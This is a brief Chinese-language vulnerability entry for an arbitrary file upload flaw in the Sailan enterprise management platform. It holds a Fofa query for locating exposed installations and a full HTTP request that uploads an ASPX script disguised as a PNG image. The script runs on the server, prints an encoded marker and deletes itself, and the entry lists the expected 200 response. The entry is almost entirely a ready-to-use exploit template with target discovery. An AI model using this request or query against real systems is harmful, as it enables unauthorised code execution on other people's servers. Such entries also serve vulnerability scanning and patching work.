赛蓝企业管理平台System_FocusList 任意文件上传

Fofa语法

body="www.cailsoft.com" || body="赛蓝企业管理系统"

漏洞POC

POST /SystemModule/System_FocusList/SubmitUploadify?FolderId=1&UserId=1 HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Connection: close ------WebKitFormBoundaryD5Mawpg068t7pbxZ Content-Disposition: form-data; name="Filedata"; filename="11.aspx" Content-Type: image/png <%@Page Language="C#"%> <%Response.Write(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.From Base64String("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));System.I O.File.Delete(Request.PhysicalPath);%> ------WebKitFormBoundaryD5Mawpg068t7pbxZ--

响应代码特征

200

响应内容特征

暂无